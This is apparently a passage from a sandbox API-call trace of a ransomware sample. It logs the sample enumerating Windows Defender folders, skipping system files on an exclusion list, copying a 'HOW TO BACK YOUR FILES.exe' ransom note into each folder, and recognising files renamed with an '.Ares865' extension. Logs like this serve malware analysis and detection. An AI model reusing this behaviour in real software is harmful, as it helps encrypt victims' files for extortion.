YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.187] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.187] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfc0a7e0, ftCreationTime.dwHighDateTime=0x1d2faf9, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0x6379d080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x33e60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpSfc.bin.Ares865", cAlternateFileName="MPSFCB~1.ARE")) returned 1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="aoldtz.exe") returned 1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2=".") returned 1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="..") returned 1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="windows") returned -1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="bootmgr") returned 1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="temp") returned -1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="pagefile.sys") returned -1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="boot") returned 1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="ids.txt") returned 1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="ntuser.dat") returned -1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="perflogs") returned -1 [0090.187] lstrcmpiW (lpString1="MpSfc.bin.Ares865", lpString2="MSBuild") returned -1 [0090.187] lstrlenW (lpString="MpSfc.bin.Ares865") returned 17 [0090.187] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*") returned 91 [0090.187] lstrcpyW (in: lpString1=0x2cce4b4, lpString2="MpSfc.bin.Ares865" | out: lpString1="MpSfc.bin.Ares865") returned="MpSfc.bin.Ares865" [0090.187] lstrlenW (lpString="MpSfc.bin.Ares865") returned 17 [0090.187] lstrlenW (lpString="Ares865") returned 7 [0090.188] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.188] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcfc0a7e0, ftCreationTime.dwHighDateTime=0x1d2faf9, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0x6379d080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x33e60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MpSfc.bin.Ares865", cAlternateFileName="MPSFCB~1.ARE")) returned 0 [0090.188] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.188] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0090.188] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Quarantine", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Quarantine") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Quarantine" [0090.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0090.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0090.188] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Quarantine") returned 73 [0090.188] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Quarantine" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Quarantine") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Quarantine" [0090.188] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.188] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Quarantine\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\quarantine\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.188] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.189] GetLastError () returned 0x0 [0090.189] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.189] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.189] CloseHandle (hObject=0x120) returned 1 [0090.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.189] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.189] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.189] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.189] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.189] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.189] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.189] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.189] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.189] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.189] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.189] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.189] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.189] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.189] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.189] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0090.189] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\LocalCopy", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\LocalCopy") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\LocalCopy" [0090.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0090.189] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0090.189] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\LocalCopy") returned 72 [0090.189] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\LocalCopy" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\LocalCopy") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\LocalCopy" [0090.190] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.190] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\LocalCopy\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\localcopy\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.190] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.190] GetLastError () returned 0x0 [0090.190] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.190] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.190] CloseHandle (hObject=0x120) returned 1 [0090.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.190] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.191] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.191] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.191] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.191] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.191] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.191] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.191] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.191] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.191] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.191] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.191] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.191] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.191] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.191] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c50 [0090.191] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates" [0090.191] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0090.191] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0090.191] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates") returned 81 [0090.191] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates" [0090.191] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.191] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\definition updates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.192] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.192] GetLastError () returned 0x0 [0090.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.192] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.192] CloseHandle (hObject=0x120) returned 1 [0090.192] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.192] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.192] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.192] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.192] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.192] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.192] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c4dee00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.193] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.193] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.193] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.193] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.193] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Backup", cAlternateFileName="")) returned 1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="aoldtz.exe") returned 1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2=".") returned 1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="..") returned 1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="windows") returned -1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="bootmgr") returned -1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="temp") returned -1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="pagefile.sys") returned -1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="boot") returned -1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="ids.txt") returned -1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="ntuser.dat") returned -1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="perflogs") returned -1 [0090.193] lstrcmpiW (lpString1="Backup", lpString2="MSBuild") returned -1 [0090.193] lstrlenW (lpString="Backup") returned 6 [0090.193] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\*") returned 83 [0090.193] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="Backup" | out: lpString1="Backup") returned="Backup" [0090.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c48 [0090.193] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb2) returned 0x2f2fc8 [0090.193] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c50 | out: ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0090.193] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c4dee00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c4dee00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.193] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.194] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Updates", cAlternateFileName="")) returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="aoldtz.exe") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2=".") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="..") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="windows") returned -1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="bootmgr") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="temp") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="pagefile.sys") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="boot") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="ids.txt") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="ntuser.dat") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="perflogs") returned 1 [0090.194] lstrcmpiW (lpString1="Updates", lpString2="MSBuild") returned 1 [0090.194] lstrlenW (lpString="Updates") returned 7 [0090.194] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 88 [0090.194] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="Updates" | out: lpString1="Updates") returned="Updates" [0090.194] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0090.194] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb4) returned 0x2f3088 [0090.194] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0090.194] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x63b2f180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63b2f180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="aoldtz.exe") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2=".") returned 1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="..") returned 1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="windows") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="bootmgr") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="temp") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="pagefile.sys") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="boot") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="ids.txt") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="ntuser.dat") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="perflogs") returned -1 [0090.194] lstrcmpiW (lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", lpString2="MSBuild") returned -1 [0090.194] lstrlenW (lpString="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 38 [0090.195] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 89 [0090.195] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="{D2B0B133-42ED-44D3-809A-46EBB62BA863}" | out: lpString1="{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0090.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 